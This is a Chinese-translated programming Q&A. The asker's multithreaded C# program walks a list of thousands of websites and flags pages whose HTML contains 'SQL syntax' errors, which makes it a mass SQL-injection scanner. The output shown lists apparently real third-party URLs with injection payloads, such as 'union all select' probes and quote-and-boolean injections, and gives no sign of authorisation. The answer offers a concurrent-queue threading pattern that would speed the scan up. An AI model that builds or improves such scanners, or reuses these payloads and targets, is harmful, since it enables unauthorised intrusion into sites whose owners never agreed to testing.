我正在编写一个程序来遍历网站列表并在每个网站中搜索HTML代码。
我有数千个网站要检查,所以我想要这个多线程。
这是我尝试多线程,但我有一个问题:每个线程都做同样的事情,结果会被转换两次。
using System;
using System.Net;
using System.IO;
using System.Threading;
using System.Threading.Tasks;
namespace SiteHunter
{
class MainClass
{
public static void Main(string[] args)
{
// Creates two threads that start the Work process.
for (int i = 0; i < 2; i++)
{
Thread th = new Thread(Work);
th.Start();
}
}
public static void Work()
{
// Reads "sites.txt"
var URLS = File.ReadLines("sites.txt");
// Iterates through "sites.txt" line by line
foreach (string URL in URLS)
{
// Try method prevents program from crashing when a URL returns a 404 or such.
try
{
// Ensures connection to the URL
Uri uriResult;
bool result = Uri.TryCreate(URL, UriKind.Absolute, out uriResult)
&& (uriResult.Scheme == Uri.UriSchemeHttp || uriResult.Scheme == Uri.UriSchemeHttps);
// If the URL can connect successfully
if (result == true)
{
// Download the HTML
WebClient client = new WebClient();
string downloadString = client.DownloadString(URL);
// Check the HTML for a specific string I want to find, and print a positive result.
if (downloadString.Contains("SQL syntax"))
Console.WriteLine("\t [+] " + URL);
// Else, the HTML didn't contain the string, return a negative result.
else
Console.WriteLine("\t [-] " + URL);
// Else, the URL didn't connect successfully.
}
else
Console.WriteLine("\t [-] Invalid URL");
// Catches any exceptions to prevent program crash, specifically 404's.
}
catch (Exception)
{
Console.WriteLine("\t [-] Error in URL");
}
}
}
}
}
[-] http://4rentoxford.com/properties.php?p=40&minprice=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--&maxprice=3000&minbedrooms=0&minbathrooms=0&propertytype=longterm&availability=%253E=0&furnished=%253C=1
[-] http://4rentoxford.com/properties.php?p=40&minprice=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--&maxprice=3000&minbedrooms=0&minbathrooms=0&propertytype=longterm&availability=%253E=0&furnished=%253C=1
[-] Error in URL
[-] Error in URL
[+] http://7school.net/newsone.php?id=[t]
[+] http://7school.net/newsone.php?id=[t]
[+] http://96ut.com/stock/jikei.php?code=7261' and [t] and '1'='1&year=2015
[+] http://96ut.com/stock/jikei.php?code=7261' and [t] and '1'='1&year=2015
[+] http://abslatin.co.uk/node.php?id=999999.9 union all select 1,2,[t]
[+] http://abslatin.co.uk/node.php?id=999999.9 union all select 1,2,[t]
[+] http://accmanagementgroup.com/rental/overview.php?propertyID=[t]
[+] http://accmanagementgroup.com/rental/overview.php?propertyID=[t]
[+] http://accord-healthcare.com/products.php?gid=[t]
[+] http://accord-healthcare.com/products.php?gid=[t]
[-] Error in URL
[-] Error in URL
[+] http://acmlm.kafuka.org/uploader/index.php?act=viewcat&id=12999999.9' union all select 1,[t],3,4,5,6 and '0'='0
[+] http://acmlm.kafuka.org/uploader/index.php?act=viewcat&id=12999999.9' union all select 1,[t],3,4,5,6 and '0'='0
[-] http://advertisinghall.org/members/member_bio.php?memid=999999.9 union all select 1,2,3,4,5,[t],7
[-] http://advertisinghall.org/members/member_bio.php?memid=999999.9 union all select 1,2,3,4,5,[t],7
正如您所看到的,我的线程是成功的,但它们只是在做同样的事情。我该如何防止这种情况?
答案 0 :(得分:0)
它的小例子:
public class UrlChecker
{
private readonly int _threadsCount;
private readonly ConcurrentQueue<string> _urlsQueue;
public UrlChecker(int threadsCount = 1)
{
_threadsCount = threadsCount;
_urlsQueue = new ConcurrentQueue<string>();
}
public void Start()
{
var threadList = new List<Thread>();
for (int i = 0; i < _threadsCount; i++)
{
threadList.Add(new Thread(ProcessUrls) { IsBackground = true });
}
threadList.ForEach(r => r.Start());
threadList.ForEach(r => r.Join());
}
public void ProcessUrls()
{
try
{
while (_urlsQueue.IsEmpty == false)
{
string url;
if (_urlsQueue.TryDequeue(out url) && url != null)
{
try
{
// process your url
}
catch (Exception ex)
{
// TODO: log url processing error
}
}
}
}
catch (Exception ex)
{
// TODO: log thread error
}
}
}
要执行此任务,只需致电new UrlChecker(threadsCount: 2).Start();